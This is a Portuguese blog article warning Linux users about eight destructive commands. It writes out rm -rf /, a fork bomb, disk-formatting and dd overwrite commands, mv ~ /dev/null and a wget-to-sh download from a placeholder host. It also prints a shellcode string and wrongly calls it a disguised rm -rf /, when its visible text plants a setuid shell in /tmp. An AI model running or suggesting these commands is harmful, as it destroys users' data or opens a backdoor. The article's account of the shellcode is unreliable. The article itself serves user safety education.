Linux: 8 Comandos Mortais Que Você Nunca Deve Executar

Crédito da imagem: Free Grunge Textures – www.freestock.ca via flickr

Os recursos do terminal de comandos do Linux são incríveis e muito úteis. Você pode modificar o sistema com uma liberdade muito grande, porém, essa liberdade tem um preço, você precisa entender tudo o que está digitando, pois existem combinações de comandos que podem literalmente destruir o seu sistema e todos os seus dados. O Linux não costuma questioná-lo se você tem certeza do que está fazendo e quais as possíveis consequências quando você utiliza certos comandos que podem danificar o sistema.

Você pode ainda, se for um usuário iniciante ou até mesmo um veterano, ser vítima de trols que frequentam fóruns e grupos de ajuda e podem indicá-lo, por piada, comandos letais que podem vir disfarçados ou em forma de scripts, sem que na maioria dos casos você perceba ou tenha a mínima ideia do que está fazendo.

É evidente que alguns destes comandos só serão perigosos se eles forem precedidos com SUDO no caso do Ubuntu (se não for o caso não funcionarão). Na maioria das outras distribuições Linux, a maior parte dos comandos devem ser executados como usuário root.

rm -rf / = Deleta Tudo!

O comando rm -f / apaga tudo que for possível deletar, incluindo arquivos no seu HD e arquivos de mídias removíveis, caso estejam conectados. Fica mais fácil entender este comando por partes:

rm – Remove os arquivos que se seguem.

-rf – Executa rm recursivamente (apaga todos os arquivos e pastas dentro da pasta especificada) e força que todos os arquivos sejam removidos sem pedir confirmação.

/ – Diz a rm para começar no diretório root (raiz) que contém todos os arquivos no seu computador e todos os dispositivos de mídia montados, incluindo arquivos compartilhados remotamente e drives removíveis.

O Linux executará o comando sem hesitar e deletará tudo, então, tome muito cuidado quando utilizá-lo! O comando rm também pode ser utilizado de outras formas perigosas como: rm -rf ~ apagaria todos os arquivos na pasta home, enquanto rm -rf .* apagaria todos os seus arquivos de configurações.

Lição 1: Cuidado quando utilizar rm -rf

rm -rf / disfarçado

Aqui está outro fragmento de código que está espalhado por toda web:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
“x6ex2fx73x68x00x2dx63x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta é a versão hexadecimal de rm -rf / — executando este comando apagará todos os seus arquivos do mesmo jeito como se você tivesse executado rm -rf / .

Lição 2: Não execute comandos de aparência estranha, obviamente comandos disfarçados que você não entende.

:(){ :|: & };: – Fork Bomb (Bomba Garfo)

comando perigoso do linux que causa (denial-of-service)
Crédito da imagem: Silveira Neto via Flickr

A linha a seguir pode parecer bonitinha, mas tome muito cuidado, essa é uma função bash muito perigosa! :

:(){ :|: & };:

Essa linha curta define uma função do shel que cria novas cópias dele mesmo. O processo o replica continuadamente, e suas cópias continuamente replicam eles mesmos, rapidamente tomando todo o tempo do seu CPU e espaço da memória. Isto pode fazer com que o seu computador congele. Podemos dizer então que isto é um ataque de negação de serviço (denial-of-service).

Lição 3: As funções Bash são poderosas, mesmo as mais curtas.

mkfs.ext4 /dev/sda1 — Formata um HD (Disco Rígido)

imagem de um hard disk aberto
Crédito da imagem: Jeff Kubina via Flickr

O comando mkfs.ext4 /dev/sda1 é fácil de entender:

mkfs.ext4 — Cria um novo sistema de arquivo ext4 no dispositivo a seguir.

/dev/sda1 — Especifica a primeira partição no primeiro HD, que está provavelmente em uso.

Usados em conjunto, este comando é a mesma coisa que executar formatar a partição c: no Windows — que irá limpar os arquivos em sua primeira partição e substituí-los por um novo sistema de arquivos.

Este comando pode vir de outras formas, tais como – mkfs.ext3 / dev/sdb2 formataria a segunda partição do segundo disco rígido com o sistema de arquivos ext3.

Lição 4: Cuidado com os comandos que executam diretamente em dispositivos de disco rígido que começam com / dev / sd.

command > /dev/das — Escreve diretamente em um HD

A linha de comando command > /dev/sda funciona de forma similar — ele executa um comando e envia a saída do comando diretamente para o seu primeiro HD, escrevendo (gravando) os dados diretamente no seu HD e danificando o seu sistema de arquivo.

command — Executa um comando (pode ser qualquer comando).

> — Envia a saída do comando para o local a seguir.

/dev/sda — Escreve (grava) a saída do comando diretamente no dispositivo do Disco Rígido.

Lição 5: Como dito acima, cuidado com a execução de comandos que envolvem dispositivos de disco rígido começando com /dev/sd.

dd if=/dev/random of=/dev/sda — Escreve lixo em um disco rígido.

A linha dd if=/dev/random of=/dev/sda também vai destruir os dados em
um de seus discos rígidos.

dd — Realiza cópia de baixo nível de um local para outro.

if = /dev/random — use /dev/random (dados aleatórios) como entrada — você também pode ver locais como /dev/zero (zeros),

of=/dev/sda — Saída para o primeiro disco rígido, substituindo seu sistema de arquivos com dados aleatórios de lixo.

Lição 6: dd copia dados de um local para outro, o que pode ser perigoso se você está copiando diretamente para um dispositivo.

mv ~ /dev/null — Move o Seu Diretório Home para um Buraco Negro

crédito da imagem: NASA Goddard Photo and Video via Flickr

/dev/null é outro local especial — mover algo para /dev/null é a mesma coisa que destruí-lo. Pense em /dev/null como um buraco negro. Essencialmente, mv ~ /dev/null envia todos os seus arquivos pessoais para um buraco negro.

mv — Move o seguinte arquivo ou diretório para outro local.

~ — Representa toda a sua pasta Home.

/dev/null — Mova sua pasta home para /dev/null, destruindo todos os seus arquivos e apagando as cópias originais.

Lição 7: O caractere ~ representa sua pasta home e mover coisas para /dev/null destrói elas.

wget http://examplo.com/algumacoisa -O – | sh — Faz o Download e Executa um Script

A linha acima faz o download de um script a partir da web e envia para sh, que executa o conteúdo do script. Isso pode ser perigoso se você não tiver certeza pra quê o script é ou se você não confiar na sua fonte — nunca execute scripts não confiáveis.

wget — Baixa um arquivo. (Você também pode ver curl no lugar de wget).

http://examplo.com/algumacoisa — Faz o download do arquivo a partir desse local.

| — Pipe (envia) a saída do comando wget (o arquivo que você baixou) diretamente para outro comando.

sh — Envia o arquivo para o comando sh, que executa-o se ele for um script bash.

Lição 8: Não faça o download ou execute scripts não confiáveis da web.


Viu algum erro ou tem outras dicas a acrescentar. Sabe outros comandos perigosos que novos ou experientes usuários Linux não devem executar? Fique à vontade e deixe o seu comentário logo abaixo para disseminar o seu conhecimento!

Fonte: howtogeekTECHsource